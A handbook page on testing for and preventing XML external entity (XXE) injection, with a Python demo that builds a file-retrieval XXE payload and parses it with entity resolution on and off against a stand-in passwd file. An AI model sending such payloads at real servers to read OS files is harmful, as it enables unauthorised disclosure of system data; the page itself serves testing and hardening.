handbook/tools/3.Web-Hacking/4.Injection/XXE/Commands/Testing-and-Prevention.md

2024-08-30 23:07:22 +00:00
## Testing & Prevention
**How to Find and Test for XXE Vulnerabilities**
- Use Burp Suite's web vulnerability scanner
- Manual testing involves the following:
  - Testing for file retrieval by defining an external entity based on a well-known OS file and referencing it in data the application returns in its response
  - Testing for blind XXE by defining an external entity based on a URL to a system you control and checking whether the server makes an out-of-band request to it
    - Burp Collaborator client can be used for this
  - Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack
**How to Prevent XXE Vulnerabilities**
- Disable features that allow the application's XML parsing library to support potentially dangerous XML features the application does not need:
  - Disable resolution of external entities
  - Disable support for XInclude
- This is done via the parser's configuration options or by programmatically overriding its default behavior
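As an added example (not part of the original handbook page), the script below ties the two lists together: it builds the file-retrieval test payload from the first list and parses it twice with the standard library's expat-based `xml.sax` reader, once with resolution of external general entities switched on and once with it switched off, as the second list recommends. The "sensitive" file it reads is constructed in a temp directory so the script runs anywhere; `feature_external_ges` is the real `xml.sax` feature name, and CPython has had it off by default since 3.7.1, so the vulnerable branch re-enables it deliberately.

```python
"""XXE: one file-retrieval payload against a parser that resolves external
entities and one that has the feature disabled. Standard library only."""
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Collects character data, i.e. what the application would echo back."""

    def __init__(self):
        super().__init__()
        self._chunks = []

    def characters(self, content):
        self._chunks.append(content)

    def text(self):
        return "".join(self._chunks)


def xxe_file_payload(system_id: str) -> bytes:
    """Classic file-retrieval test: declare an external entity pointing at a
    well-known OS file and reference it in an element the server returns."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "{system_id}">]>\n'
        '<data>&xxe;</data>'
    ).encode()


def parse_untrusted(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse attacker-controlled XML and return the character data seen.

    feature_external_ges controls whether expat fetches external general
    entities. True reproduces a parser with an unsafe default; False is the
    hardened configuration (the entity reference is silently dropped).
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def demo() -> tuple:
    """Return (text leaked by the vulnerable parser, text from the hardened one)."""
    # Constructed stand-in for /etc/passwd so the demo does not depend on the host.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
        secret_path = f.name
    try:
        payload = xxe_file_payload(Path(secret_path).as_uri())  # file:///... URI
        leaked = parse_untrusted(payload, resolve_external_entities=True)
        blocked = parse_untrusted(payload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("external entities ON  ->", repr(leaked))
    print("external entities OFF ->", repr(blocked))
```

The same payload is what you would send during manual testing, with the SYSTEM identifier pointed at a real OS file; if its contents come back in the response, the parser resolves external entities. For lxml the equivalent hardening is `etree.XMLParser(resolve_entities=False, no_network=True)`; XInclude is likewise a parser feature to leave disabled unless the application actually needs it.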